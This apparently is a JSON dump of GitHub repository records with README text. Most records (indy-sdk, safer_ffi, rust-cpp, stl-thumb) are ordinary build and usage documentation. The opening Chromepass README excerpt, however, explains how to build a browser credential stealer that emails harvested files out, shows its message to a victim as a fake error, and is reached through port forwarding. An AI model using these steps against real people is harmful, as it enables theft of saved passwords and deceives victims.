\n\n---\n\n## Email\nChromepass supports sending the files via email, although it's still experimental.\nTo enable this, you can use the `--email` flag while creating the server. You'll need two things: a username (your email) and a password (an app password).\n\nTo generate an app password you must go into your `account settings` -> `Security` and enable 2-step authentication (required!)\n\nAfter 2-step authentication is enabled, you'll see a new option called `App Passwords`:\n![2-step-authentication](https://i.imgur.com/Ip3ShCI.png)\n\nYou want to click there, choose the appropriate options, and then generate a password:\n![2-step-authentication](https://i.imgur.com/DoQQ4Qn.png) \n\nAfter clicking `Generate` it will give you the needed password.\nYou can use the username and password directly in the command or you can simply put them inside the `config.ini`, where it says `YOUR_USERNAME` and `YOUR_PASSWORD`.\n\n### Example with credentials in command\n```powershell\npython create.py --error --message 'An Error has happened' --email --username myuser@gmail.com --password qwertyuiopasdfghh\n```\n### If you put the credentials in the config file (you'll see where if you open this file)\n```powershell\npython create.py --error --message 'An Error has happened' --email\n```\n\n### Remote Notes\n>If you'd like to use this in a remote scenario, you must also perform port forwarding (port 80 by default), so that when the victim runs the client it is able to connect to the server on the correct port. \nFor more general information, click [here](https://www.noip.com/support/knowledgebase/general-port-forwarding-guide/). If you're still not satisfied, perform a Google search.\n\n---\n\n## Manual dependency installation\n\nThe automated setup is experimental. For one reason or another, the setup might fail to correctly install the dependencies. If that's the case, you must install them manually. \nFortunately, there are only 2 dependencies: \n - [Microsoft Visual C++ Build Tools](https://visualstudio.microsoft.com/thank-you-downloading-visual-studio/?sku=BuildTools&rel=16) (install with the recommended workflows)\n - [Rustup](https://rustup.rs/)\n\nInstead of the build tools you can also just install Visual Studio, but it will take more space.\n\nAfter successfully installing the build tools, you can simply run the `rustup-init.exe` from [Rustup](https://rustup.rs/)'s website.\n\nThis completes the required dependencies and you should be good to go.\n\n---\n\n## Errors, Bugs and feature requests\n\nIf you find an error or a bug, please report it as an issue.\nIf you wish to suggest a feature or an improvement, please report it on the issues page.\n\nPlease follow the templates shown when creating the issue. \n\n---\n\n\n## Learn More\n\nFor access to a community full of aspiring computer security experts, ranging from the complete beginner to the seasoned veteran,\njoin our Discord Server: [WhiteHat Hacking](https://discord.gg/beczNYP)\n\nIf you wish to contact me, you can do so via: `mario@whitehathacking.tech` \n\n---\n\n## Disclaimer\nI am not responsible for what you do with the information and code provided. 
This is intended for professional or educational purposes only.\n\n## License\n AGPL-3.0 \n\n---\n[![Code Intelligence Status](https://scrutinizer-ci.com/g/darkarp/chromepass/badges/code-intelligence.svg?b=master)](https://scrutinizer-ci.com/code-intelligence) \n\n[Python]: https://www.python.org/\n\n## Demo\n![til](./templates/resources/demo.gif)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "hyperledger/indy-sdk", "link": "https://github.com/hyperledger/indy-sdk", "tags": ["hyperledger-indy", "aries", "ssi", "zkp", "hacktoberfest"], "stars": 649, "description": "indy-sdk", "lang": "Rust", "repo_lang": "", "readme": "# Indy SDK\n![logo](https://raw.githubusercontent.com/hyperledger/indy-node/master/collateral/logos/indy-logo.png)\nThis is the official SDK for [Hyperledger Indy](https://www.hyperledger.org/projects),\nwhich provides a distributed-ledger-based foundation for [self-sovereign identity](https://sovrin.org). Indy provides a software ecosystem for private, secure, and powerful identity, and the Indy SDK enables clients for it.\nThe major artifact of the SDK is a C-callable\nlibrary; there are also convenience wrappers for various programming languages and the Indy CLI tool.\n\nAll bugs, stories, and backlog for this project are managed through [Hyperledger's Jira](https://jira.hyperledger.org/secure/RapidBoard.jspa)\nin project IS (note that regular Indy tickets are in the INDY project instead...). Also, make sure to join\nus on [Hyperledger's Rocket.Chat](https://chat.hyperledger.org/) at #indy-sdk to discuss. You will need a Linux Foundation login to get access to these channels.\n\n## Understanding Hyperledger Indy\n\nIf you have just started learning about self-sovereign identity, here are some resources to increase your understanding:\n\n* This extended tutorial introduces Indy, explains how the whole ecosystem works, and how the\nfunctions in the SDK can be used to construct rich clients: [Indy-SDK Getting-Started Guide](docs/getting-started/indy-walkthrough.md)\n\n  * **Please take note** that this tutorial doesn't cover how sides set up a connection and exchange messages.\n  How this communication channel can be built is described in great detail in the [Aries](https://github.com/hyperledger/aries) project.\n\n* Hyperledger Indy Working Group calls happen every Thursday at 8amPT, 9amMT, 11amET, 4pmBST. Add to your calendar and join from any device: https://zoom.us/j/232861185\n\n* A recent webinar explaining self-sovereign identity using Hyperledger Indy and Sovrin: [SSI Meetup Webinar](https://youtu.be/RllH91rcFdE?t=4m30s)\n\n* Visit the main resource for all things \"Indy\" to get acquainted with the code base, helpful resources, and up-to-date information: [Hyperledger Wiki-Indy](https://wiki.hyperledger.org/display/indy/).\n\n* You may also want to look at the [older guide](https://github.com/hyperledger/indy-node/blob/stable/getting-started.md)\nthat explored the ecosystem via command line. 
That material is being\nrewritten but still contains some useful ideas.\n\n## Items included in this SDK\n\n### libindy\n\nThe major artifact of the SDK is a C-callable library that provides the basic building blocks for\nthe creation of applications on top of [Hyperledger Indy](https://www.hyperledger.org/projects/hyperledger-indy).\nIt is available for most popular desktop, mobile and server platforms.\n\n### Libindy wrappers\n\nA set of libindy wrappers for developing Indy-based applications in your favorite programming language.\nIndy SDK provides libindy wrappers for the following programming languages and platforms:\n\n* [Java](wrappers/java/README.md)\n* [Python](wrappers/python/README.md)\n* [iOS](wrappers/ios/README.md)\n* [NodeJS](wrappers/nodejs/README.md)\n* [.Net](wrappers/dotnet/README.md)\n* [Rust](wrappers/rust/README.md)\n\n\n### Indy CLI\n\n[Indy CLI](cli/README.md) is the official command line interface that helps Indy developers and administrators.\n\n\n### Libnullpay\n\n[Libnullpay](/libnullpay/README.md) is a libindy plugin that can be used for development of applications that use the Payments API of Indy SDK.\n\n### Libvcx\n[Libvcx](/vcx/README.md) is a C-callable library built on top of libindy that provides a high-level\ncredential exchange protocol. It simplifies creation of agent applications and provides\nbetter agent-2-agent interoperability for [Hyperledger Indy](https://www.hyperledger.org/projects/hyperledger-indy)\ninfrastructure.\n\nThis library is currently in an **experimental** state and is not part of official releases.\n\n### Libvcx wrappers\n\nA set of libvcx wrappers for developing vcx-based applications in your favorite programming language.\n\nIndy SDK provides libvcx wrappers for the following programming languages and platforms:\n\n* [Java](/vcx/wrappers/java/README.md)\n* [Python](/vcx/wrappers/python3/README.md)\n* [iOS](vcx/wrappers/ios/README.md)\n* [NodeJS](/vcx/wrappers/node/README.md)\n\nThese wrappers are currently in an **experimental** state and are not part of official releases.\n\n##### Example use\n- For the main workflow example check [VCX Python demo](https://github.com/hyperledger/indy-sdk/tree/master/vcx/wrappers/python3/demo).\n- Another libvcx example is available as [VCX NodeJS demo](https://github.com/hyperledger/indy-sdk/tree/master/vcx/wrappers/node#run-demo).\n- For mobile see [iOS Demo project](https://github.com/sktston/vcx-demo-ios) \n\n### LibVCX Agency\nLibVCX can be used with a \n[mediator agency](https://github.com/hyperledger/aries-rfcs/blob/master/concepts/0046-mediators-and-relays/README.md)\nthat enables asynchronous communication between 2 parties. \n- [Dummy Cloud Agent](/vcx/dummy-cloud-agent/README.md) is a simple implementation of a VCX-compatible Cloud Agent.\nThe main purpose of this implementation is VCX testing, demos and documentation of the VCX protocol.\n- [NodeVCXAgency](https://github.com/AbsaOSS/vcxagencynode) is an alternative implementation in NodeJS.\n\n## How-To Tutorials\nShort, simple tutorials that demonstrate how to accomplish common tasks\nare also available. See the [docs/how-tos](docs/how-tos) folder.\n\n1. [Write a DID and Query Its Verkey](docs/how-tos/write-did-and-query-verkey/README.md)\n2. [Rotate a Key](docs/how-tos/rotate-key/README.md)\n3. [Save a Schema and Cred Def](docs/how-tos/save-schema-and-cred-def/README.md)\n4. [Issue a Credential](docs/how-tos/issue-credential/README.md)\n5. [Negotiate a Proof](docs/how-tos/negotiate-proof/README.md)\n6. 
[Send a Secure Message](docs/how-tos/send-secure-msg/README.md)\n\n## Installing the SDK\n### Release channels\nThe Indy SDK release process defines the following release channels:\n\n* `master` - development builds for each push to master branch.\n* `rc` - release candidates.\n* `stable` - stable releases.\n\nPlease refer to our [release workflow](docs/contributors/release-workflow.md) for more details.\n\n### Ubuntu based distributions (Ubuntu 16.04 and 18.04)\nIt is recommended to install the SDK packages with APT:\n\n    sudo apt-get install ca-certificates -y\n    sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys CE7709D068DB5E88\n    sudo add-apt-repository \"deb https://repo.sovrin.org/sdk/deb (xenial|bionic) {release channel}\"\n    sudo apt-get update\n    sudo apt-get install -y {library}\n\n* {library} must be replaced with libindy, libnullpay, libvcx or indy-cli.\n* (xenial|bionic) xenial for 16.04 Ubuntu and bionic for 18.04 Ubuntu.\n* {release channel} must be replaced with master, rc or stable to select the corresponding release channel.\nPlease see the section \"Release channels\" above for more details.\n\n### Windows\n\n1. Go to `https://repo.sovrin.org/windows/{library}/{release-channel}`.\n2. Download the latest version of the library.\n3. Unzip the archive to the directory where you want to save the working library.\n4. After unzipping you will get the following file structure:\n\n* `Your working directory for libindy`\n    * `include`\n        * `...`\n    * `lib`\n        * `indy.dll`\n        * `libeay32md.dll`\n        * `libsodium.dll`\n        * `libzmq.dll`\n        * `ssleay32md.dll`\n\n`include` contains C header files with all the necessary declarations\nthat may be needed by your applications.\n\n`lib` contains all the necessary binaries: libindy and all of its dependencies.\n `You must add the path to lib to the PATH environment variable.` This is necessary for dynamically linking\n your application with libindy.\n\n{release channel} must be replaced with master, rc or stable to select the corresponding release channel.\nSee section \"Release channels\" for more details.\n\n{library} must be replaced with libindy, libnullpay, libvcx or indy-cli.\n\n### iOS\n\nSee [wrapper iOS install documentation](wrappers/ios/README.md \"How to install\").\n\n### Android\n\n1. Go to `https://repo.sovrin.org/android/{library}/{release-channel}`.\n2. 
This will help you in having the compatibility with existing wrappers.\n\n * `libindy.a` - This is a static library, which is compiled with NDK.\n\n{library} must be replaced with libindy, libnullpay or libvcx.\n\n [How to use instructions.](https://github.com/hyperledger/indy-sdk/blob/master/docs/build-guides/android-build.md#usage) \n\n{release channel} must be replaced with rc or stable to define corresponded release channel.\nSee section \"Release channels\" for more details.\n\n **Note** :\n\n - [WARNING] This library should be considered as experimental as currently unit tests are *not* executed in the CI phase.\n\n\n### Centos\n\n1. Go to `https://repo.sovrin.org/rpm/{library}/{release-channel}`.\n2. Download and unzip the last version of library.\n3. Install with `rpm -i library-version.rpm`.\n\n{library} must be replaced with libindy, libnullpay, libvcx, indy-cli to define corresponded library.\n\n{release channel} must be replaced with master, rc or stable to define corresponded release channel.\nSee section \"Release channels\" for more details.\n\n### MacOS\n\n1. Go to `https://repo.sovrin.org/macos/{library}/{release-channel}`.\n2. Download the latest version of library.\n3. Unzip archives to the directory where you want to save working library.\n4. After unzip you will get next structure of files:\n\n* `Your working directory`\n * `include` - contains c-header files which contains all necessary declarations that may be need for your applications.\n * `...`\n * `lib` - contains library binaries (static and dynamic).\n * `library.a`\n * `library.dylib`\n \n5. Install dependent libraries: libsodium, zeromq, openssl. The dependent libraries should match the version with what you can find from ``otool -L libindy.dylib``.\n\nYou need add the path to lib folder to LIBRARY_PATH environment variable. 
\n \n{library} must be replaced with libindy, libnullpay, libvcx or indy-cli to define corresponded library.\n\n{release channel} must be replaced with master, rc or stable to define corresponded release channel.\n \n## How to build Indy SDK from source\n\n* [Ubuntu based distributions (Ubuntu 16.04)](docs/build-guides/ubuntu-build.md)\n* [RHEL based distributions (Centos)](docs/build-guides/rhel-build.md)\n* [Windows](docs/build-guides/windows-build.md)\n* [MacOS](docs/build-guides/mac-build.md)\n* [Android](docs/build-guides/android-build.md)\n\n**Note:**\nBy default `cargo build` produce debug artifacts with a large amount of run-time checks.\nIt's good for development, but this build can be in 100+ times slower for some math calculation.\nIf you would like to analyse CPU performance of libindy for your use case, you have to use release artifacts (`cargo build --release`).\n\n## How to start local nodes pool with docker\nTo test the SDK codebase with a virtual Indy node network, you can start a pool of local nodes using docker:\n\n**Note: If you are getting a PoolLedgerTimeout error it's because the IP addresses in\ncli/docker_pool_transactions_genesis and the pool configuration don't match.\nUse method 3 to configure the IPs of the docker containers to match the pool.**\n\n### 1) Starting the test pool on localhost\nStart the pool of local nodes on `127.0.0.1:9701-9708` with Docker by running:\n\n```\ndocker build -f ci/indy-pool.dockerfile -t indy_pool .\ndocker run -itd -p 9701-9708:9701-9708 indy_pool\n```\n\n### 2) Starting the test pool on a specific IP address\n Dockerfile `ci/indy-pool.dockerfile` supports an optional pool_ip param that allows\n changing ip of pool nodes in generated pool configuration.\n\n You can start the pool with e.g. with the IP address of your development machine's WIFI interface\n so that mobile apps in the same network can reach the pool.\n\n ```\n # replace 192.168.179.90 with your wifi IP address\n docker build --build-arg pool_ip=192.168.179.90 -f ci/indy-pool.dockerfile -t indy_pool .\n docker run -itd -p 192.168.179.90:9701-9708:9701-9708 indy_pool\n ```\n To connect to the pool the IP addresses in /var/lib/indy/sandbox/pool_transactions_genesis (in docker) and\n the pool configuration you use in your mobile app must match.\n\n### 3) Starting the test pool on a docker network\n The following commands allow to start local nodes pool in custom docker network and access this pool\n by custom ip in docker network:\n\n ```\n docker network create --subnet 10.0.0.0/8 indy_pool_network\n docker build --build-arg pool_ip=10.0.0.2 -f ci/indy-pool.dockerfile -t indy_pool .\n docker run -d --ip=\"10.0.0.2\" --net=indy_pool_network indy_pool\n ```\n Note that for Windows and MacOS this approach has some issues. Docker for these OS run in\n their virtual environment. First command creates network for container and host can't\n get access to that network because container placed on virtual machine. You must appropriate set up\n networking on your virtual environment. 
See the instructions for MacOS below.\n\n### Docker port mapping on MacOS\n\nIf you use a Docker distribution based on VirtualBox you can use VirtualBox's\nport forwarding feature to map the 9701-9709 container ports to the local 9701-9709 ports.\n\nIf you use VMWare Fusion to run Docker locally, follow the instructions from\n[this article](https://medium.com/@tuweizhong/how-to-setup-port-forward-at-vmware-fusion-8-for-os-x-742ad6ca1344)\nand add the following lines to _/Library/Preferences/VMware Fusion/vmnet8/nat.conf_:\n\n```\n# Use these with care - anyone can enter into your VM through these...\n# The format and example are as follows:\n# <external port> = <VM's IP>:<VM's port>\n#8080 = 172.16.3.128:80\n9701 = <docker_host_ip>:9701\n9702 = <docker_host_ip>:9702\n9703 = <docker_host_ip>:9703\n9704 = <docker_host_ip>:9704\n9705 = <docker_host_ip>:9705\n9706 = <docker_host_ip>:9706\n9707 = <docker_host_ip>:9707\n9708 = <docker_host_ip>:9708\n9709 = <docker_host_ip>:9709\n```\nwhere <docker_host_ip> is your Docker host IP.\n\nThe Docker machine needs to be rebooted after these changes.\n\n## Wrappers documentation\n\nThe following [wrappers](docs/architecture/language-bindings.md) are tested and complete. \n\nThere is also active work on a wrapper for Go; visit\n[#indy-sdk on Rocket.Chat](https://chat.hyperledger.org/channel/indy-sdk) for\ndetails.\n\n## Indy CLI documentation\n* An explanation of how to install the official command line interface that provides commands to manage wallets and interactions with the ledger: [Indy CLI](cli/README.md)\n\n## How to migrate\nThe following documents provide the information necessary for Libindy migrations:\n \n* [v1.3.0 \u2192 v1.4.0](docs/migration-guides/migration-guide-1.3.0-1.4.0.md)\n* [v1.4.0 \u2192 v1.5.0](docs/migration-guides/migration-guide-1.4.0-1.5.0.md)\n* [v1.5.0 \u2192 v1.6.x](docs/migration-guides/migration-guide-1.5.0-1.6.0.md)\n* [v1.6.0 \u2192 v1.7.x](docs/migration-guides/migration-guide-1.6.0-1.7.0.md)\n* [v1.7.0 \u2192 v1.8.x](docs/migration-guides/migration-guide-1.7.0-1.8.0.md)\n* [v1.8.0 \u2192 v1.9.x](docs/migration-guides/migration-guide-1.8.0-1.9.0.md)\n* [v1.9.0 \u2192 v1.10.x](docs/migration-guides/migration-guide-1.9.0-1.10.0.md)\n* [v1.10.0 \u2192 v1.11.x](docs/migration-guides/migration-guide-1.10.0-1.11.0.md)\n* [v1.11.0 \u2192 v1.12.x](docs/migration-guides/migration-guide-1.11.0-1.12.0.md)\n* [v1.12.0 \u2192 v1.13.x](docs/migration-guides/migration-guide-1.12.0-1.13.0.md)\n* [v1.13.0 \u2192 v1.14.x](docs/migration-guides/migration-guide-1.13.0-1.14.0.md)\n* [v1.14.0 \u2192 v1.15.x](docs/migration-guides/migration-guide-1.14.0-1.15.0.md)\n* [v1.15.0 \u2192 v1.16.x](docs/migration-guides/migration-guide-1.15.0-1.16.0.md)\n\n## How to Contribute\n* We'd love your help; see the [HL Indy Wiki](https://wiki.hyperledger.org/display/indy/How+to+Contribute) and these [slides on how to contribute](http://bit.ly/2ugd0bq).\n* If you need to add a new call, read these [instructions](docs/how-tos/how-to-add-a-new-API-call.md).\n* You may also want to read this info about [maintainers](MAINTAINERS.md) and our process.\n* We use a developer certificate of origin (DCO) in all hyperledger repositories,\n so to get your pull requests accepted, you must certify your commits by signing off on each commit.\n More information can be found in the [Signing Commits](docs/contributors/signing-commits.md) article.\n\n\n#### Notes\n* Libindy implements a multithreading approach based on **mpsc channels**.\nIf your application needs to use Libindy from multiple processes, keep in mind the following restrictions:\n * Fork - duplicates only the main thread. 
So, child threads will not be duplicated.\n If out-of-process use is possible, the caller must fork first **before any calls to Libindy**\n (otherwise commands issued from the child process will hang). Fork is only available on Unix.\n * Popen - spawns a new OS-level process which will create its own child threads. Popen is cross-platform.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "getditto/safer_ffi", "link": "https://github.com/getditto/safer_ffi", "tags": [], "stars": 649, "description": "Write safer FFI code in Rust without polluting it with unsafe code", "lang": "Rust", "repo_lang": "", "readme": "\n\n![safer-ffi-banner](\nhttps://github.com/getditto/safer_ffi/blob/banner/guide/assets/safer_ffi.jpg?raw=true)\n\n[![CI](\nhttps://github.com/getditto/safer_ffi/workflows/CI/badge.svg?branch=master)](\nhttps://github.com/getditto/safer_ffi/actions)\n[![guide](https://img.shields.io/badge/guide-mdbook-blue)](\nhttps://getditto.github.io/safer_ffi)\n[![docs-rs](https://docs.rs/safer-ffi/badge.svg)](\nhttps://getditto.github.io/safer_ffi/rustdoc/safer_ffi)\n[![crates-io](https://img.shields.io/crates/v/safer-ffi.svg)](\nhttps://crates.io/crates/safer-ffi)\n[![repository](https://img.shields.io/badge/repository-GitHub-brightgreen.svg)](\nhttps://github.com/getditto/safer_ffi)\n\n\n\n# What is `safer_ffi`?\n\n`safer_ffi` is a framework that helps you write foreign function interfaces (FFI) without polluting your Rust code with `unsafe { ... }` code blocks while making functions far easier to read and maintain.\n\n> [\ud83d\udcda Read The User Guide \ud83d\udcda][user guide]\n\n[user guide]: https://getditto.github.io/safer_ffi\n\n## Prerequisites\n\nMinimum Supported Rust Version: `1.60.0`\n\n# Quickstart\n\n
#### Small self-contained demo\n\nYou may try working with the `examples/point` example embedded in the repo:\n\n```bash\ngit clone https://github.com/getditto/safer_ffi && cd safer_ffi\n(cd examples/point && make)\n```\n\nOtherwise, to start using `::safer_ffi`, follow these steps:\n\n### Crate layout\n\n#### Step 1: `Cargo.toml`\n\nEdit your `Cargo.toml` like so:\n\n```toml\n[package]\nname = \"crate_name\"\nversion = \"0.1.0\"\nedition = \"2021\"\n\n[lib]\ncrate-type = [\n \"staticlib\", # Ensure it gets compiled as a (static) C library\n # \"cdylib\", # If you want a shared/dynamic C library (advanced)\n \"lib\", # For downstream Rust dependents: `examples/`, `tests/` etc.\n]\n\n[dependencies]\n# Use `cargo add` or `cargo search` to find the latest values of x.y.z.\n# For instance:\n# cargo add safer-ffi\nsafer-ffi.version = \"x.y.z\"\nsafer-ffi.features = [] # you may add some later on.\n\n[features]\n# If you want to generate the headers, use a feature-gate\n# to opt into doing so:\nheaders = [\"safer-ffi/headers\"]\n```\n\n - Where `\"x.y.z\"` ought to be replaced by the latest released version, which you\n can find by running `cargo search safer-ffi`.\n\n - See the [dedicated chapter on `Cargo.toml`][cargo-toml] for more info.\n\n#### Step 2: `src/lib.rs`\n\nThen, to export a Rust function to FFI, add the\n[`#[derive_ReprC]`][derive_ReprC] and [`#[ffi_export]`][ffi_export] attributes\nlike so:\n\n```rust ,no_run\nuse ::safer_ffi::prelude::*;\n\n/// A `struct` usable from both Rust and C\n#[derive_ReprC]\n#[repr(C)]\n#[derive(Debug, Clone, Copy)]\npub struct Point {\n x: f64,\n y: f64,\n}\n\n/* Export a Rust function to the C world. */\n/// Returns the middle point of `[a, b]`.\n#[ffi_export]\nfn mid_point(a: &Point, b: &Point) -> Point {\n Point {\n x: (a.x + b.x) / 2.,\n y: (a.y + b.y) / 2.,\n }\n}\n\n/// Pretty-prints a point using Rust's formatting logic.\n#[ffi_export]\nfn print_point(point: &Point) {\n println!(\"{:?}\", point);\n}\n\n// The following function is only necessary for the header generation.\n#[cfg(feature = \"headers\")] // c.f. the `Cargo.toml` section\npub fn generate_headers() -> ::std::io::Result<()> {\n ::safer_ffi::headers::builder()\n .to_file(\"rust_points.h\")?\n .generate()\n}\n```\n\n - See [the dedicated chapter on `src/lib.rs`][lib-rs] for more info.\n\n#### Step 3: `examples/generate-headers.rs`\n\n```rust ,ignore\nfn main() -> ::std::io::Result<()> {\n ::crate_name::generate_headers()\n}\n```\n\n### Compilation & header generation\n\n```bash\n# Compile the C library (in `target/{debug,release}/libcrate_name.ext`)\ncargo build # --release\n\n# Generate the C header\ncargo run --features headers --example generate-headers\n```\n\n - See [the dedicated chapter on header generation][header-generation] for\n more info.\n\n
Generated C header (`rust_points.h`):\n\n```C\n/*! \\file */\n/*******************************************\n * *\n * File auto-generated by `::safer_ffi`. *\n * *\n * Do not manually edit this file. *\n * *\n *******************************************/\n\n#ifndef __RUST_CRATE_NAME__\n#define __RUST_CRATE_NAME__\n#ifdef __cplusplus\nextern \"C\" {\n#endif\n\n\n#include <stddef.h>\n#include <stdint.h>\n\n/** \\brief\n * A `struct` usable from both Rust and C\n */\ntypedef struct Point {\n /** */\n double x;\n\n /** */\n double y;\n} Point_t;\n\n/** \\brief\n * Returns the middle point of `[a, b]`.\n */\nPoint_t\nmid_point (\n Point_t const * a,\n Point_t const * b);\n\n/** \\brief\n * Pretty-prints a point using Rust's formatting logic.\n */\nvoid\nprint_point (\n Point_t const * point);\n\n\n#ifdef __cplusplus\n} /* extern \"C\" */\n#endif\n\n#endif /* __RUST_CRATE_NAME__ */\n```\n\n___\n\n
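Before wiring the header into C, it can help to sanity-check the exported function from the Rust side first; the \"lib\" crate-type in the `Cargo.toml` above exists precisely for such downstream Rust tests. What follows is a minimal sketch, not part of the official example, assuming the `Point` and `mid_point` definitions from the `src/lib.rs` shown above:\n\n```rust\n// Hypothetical unit test appended to the bottom of `src/lib.rs`.\n// It exercises the same function that the C code below will call.\n#[cfg(test)]\nmod tests {\n    use super::*;\n\n    #[test]\n    fn mid_point_is_halfway() {\n        // Same inputs as the `main.c` example further down.\n        let a = Point { x: 84.0, y: 45.0 };\n        let b = Point { x: 0.0, y: 39.0 };\n        let m = mid_point(&a, &b);\n        assert_eq!((m.x, m.y), (42.0, 42.0));\n    }\n}\n```\n\nRunning `cargo test` should pass before moving on to the C side.\n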
\n\n## Testing it from C\n\nHere is a basic example to showcase FFI calling into our exported Rust\nfunctions:\n\n### `main.c`\n\n```C\n#include <stdlib.h>\n\n#include \"rust_points.h\"\n\nint\nmain (int argc, char const * const argv[])\n{\n Point_t a = { .x = 84, .y = 45 };\n Point_t b = { .x = 0, .y = 39 };\n Point_t m = mid_point(&a, &b);\n print_point(&m);\n return EXIT_SUCCESS;\n}\n```\n\n### Compilation command\n\n```bash\ncc -o main{,.c} -L target/debug -l crate_name -l{pthread,dl,m}\n\n# Now feel free to run the compiled binary\n./main\n```\n\n -
Note regarding the extra -l\u2026 flags.\n\n Those vary based on the version of the Rust standard library being used, and\n the system being used to compile it. In order to reliably know which ones to\n use, `rustc` itself ought to be queried for it.\n\n Simple command:\n\n ```bash\n rustc --crate-type=staticlib --print=native-static-libs - </dev/null 2>&1 | sed -nE 's/^note: native-static-libs: (.*)/\\1/p'\n ```\n\n Ideally, you would not query for this information _in a vacuum_ (_e.g._,\n a `/dev/null` file being used as the input Rust code just above), and rather\n would apply it to your actual code being compiled:\n\n ```bash\n cargo rustc -q -- --print=native-static-libs \\\n 2>&1 | sed -nE 's/^note: native-static-libs: (.*)/\\1/p'\n ```\n\n And if you really wanted to polish things further, you could use the\n JSON-formatted compiler output (this, for instance, avoids having to\n redirect `stderr`). But then you'd have to use a JSON parser, such as `jq`:\n\n ```bash\n RUST_STDLIB_DEPS=$(set -eo pipefail && \\\n cargo rustc \\\n --message-format=json \\\n -- --print=native-static-libs \\\n | jq -r '\n select (.reason == \"compiler-message\")\n | .message.message\n ' | sed -nE 's/^native-static-libs: (.*)/\\1/p' \\\n )\n ```\n\n and then use:\n\n ```bash\n cc -o main{,.c} -L target/debug -l crate_name ${RUST_STDLIB_DEPS}\n ```\n\n
\n\nwhich outputs:\n\n```text\nPoint { x: 42.0, y: 42.0 }\n```\n\n\ud83d\ude80\ud83d\ude80\n\n[callbacks]: https://getditto.github.io/safer_ffi/callbacks/_.html\n[cargo-toml]: https://getditto.github.io/safer_ffi/usage/cargo-toml.html\n[ffi_export]: https://getditto.github.io/safer_ffi/ffi-export/_.html\n[header-generation]: https://getditto.github.io/safer_ffi/usage/lib-rs.html#header-generation\n[derive_ReprC]: https://getditto.github.io/safer_ffi/derive-reprc/_.html\n[lib-rs]: https://getditto.github.io/safer_ffi/usage/lib-rs.html\n\n
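As a further illustrative sketch (not from the official guide), the same two attributes compose for additional functions on the `Point` type from the quickstart; a hypothetical `scale_point` export would follow exactly the `mid_point` pattern:\n\n```rust\nuse ::safer_ffi::prelude::*;\n\n// Assumes the `Point` type declared in the quickstart's `src/lib.rs` above;\n// a duplicate glob import of the prelude is harmless in Rust.\n\n/// Returns `p` scaled by `factor`, reusing the `&Point -> Point`\n/// signature shape already shown for `mid_point`.\n#[ffi_export]\nfn scale_point(p: &Point, factor: f64) -> Point {\n    Point {\n        x: p.x * factor,\n        y: p.y * factor,\n    }\n}\n```\n\nRegenerating the header with `cargo run --features headers --example generate-headers` would then emit a matching `scale_point` prototype into `rust_points.h`.\n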
\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "mystor/rust-cpp", "link": "https://github.com/mystor/rust-cpp", "tags": ["rust", "macros", "rust-cpp", "c-plus-plus", "ffi"], "stars": 649, "description": "Embed C++ directly inside your rust code!", "lang": "Rust", "repo_lang": "", "readme": "# rust-cpp - Embed C++ code directly in Rust\n\n[![Build status](https://ci.appveyor.com/api/projects/status/uu76vmcrwnjqra0u/branch/master?svg=true)](https://ci.appveyor.com/project/mystor/rust-cpp/branch/master)\n[![Documentation](https://docs.rs/cpp/badge.svg)](https://docs.rs/cpp/)\n\n## Overview\n\n`rust-cpp` is a build tool & macro which enables you to write C++ code inline in\nyour rust code.\n\n```rust\nlet name = std::ffi::CString::new(\"World\").unwrap();\nlet name_ptr = name.as_ptr();\nlet r = unsafe {\n cpp!([name_ptr as \"const char *\"] -> u32 as \"int32_t\" {\n std::cout << \"Hello, \" << name_ptr << std::endl;\n return 42;\n })\n};\nassert_eq!(r, 42)\n```\n\nThe crate also help to expose some C++ class to Rust by automatically\nimplementing trait such as Drop, Clone (if the C++ type can be copied), and others\n\n```rust\ncpp_class!{\n #[derive(PartialEq)]\n unsafe struct MyClass as \"std::unique_ptr\"\n}\n```\n\n## Usage\n\nFor usage information and in-depth documentation, see\nthe [`cpp` crate module level documentation](https://docs.rs/cpp).\n\n\n## Differences with the [`cxx`](https://cxx.rs) crate\n\nThis crate allows to write C++ code \"inline\" within your Rust functions, while with the [`cxx`](https://cxx.rs) crate, you have\nto write a bit of boiler plate to have calls to functions declared in a different `.cpp` file.\n\nHaving C++ code inline might be helpful when trying to call to a C++ library and that one may wish to make plenty of call to small snippets.\nIt can otherwise be fastidious to write and maintain the boiler plate for many small functions in different places. \n\nThese crate can also be used in together. The `cxx` crate offer some useful types such as `CxxString` that can also be used with this crate.\n\nThe `cxx` bridge does more type checking which can avoid some classes of errors. While this crate can only check for equal size and alignment.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "unlimitedbacon/stl-thumb", "link": "https://github.com/unlimitedbacon/stl-thumb", "tags": ["3d-printing", "stl-files", "3d-models"], "stars": 648, "description": "Thumbnail generator for STL files", "lang": "Rust", "repo_lang": "", "readme": "# stl-thumb\n\n[![Build Status](https://github.com/unlimitedbacon/stl-thumb/workflows/Build/badge.svg)](https://github.com/unlimitedbacon/stl-thumb/actions/workflows/build-ci.yml)\n[![Build Status](https://ci.appveyor.com/api/projects/status/exol1llladgo3f98/branch/master?svg=true)](https://ci.appveyor.com/project/unlimitedbacon/stl-thumb/branch/master)\n[![Documentation](https://img.shields.io/docsrs/stl-thumb/latest)](https://docs.rs/stl-thumb/latest/stl_thumb/)\n[![Crates.io](https://img.shields.io/crates/v/stl-thumb.svg)](https://crates.io/crates/stl-thumb)\n\nStl-thumb is a fast lightweight thumbnail generator for STL files. It can show previews for STL files in your file manager on Linux and Windows. 
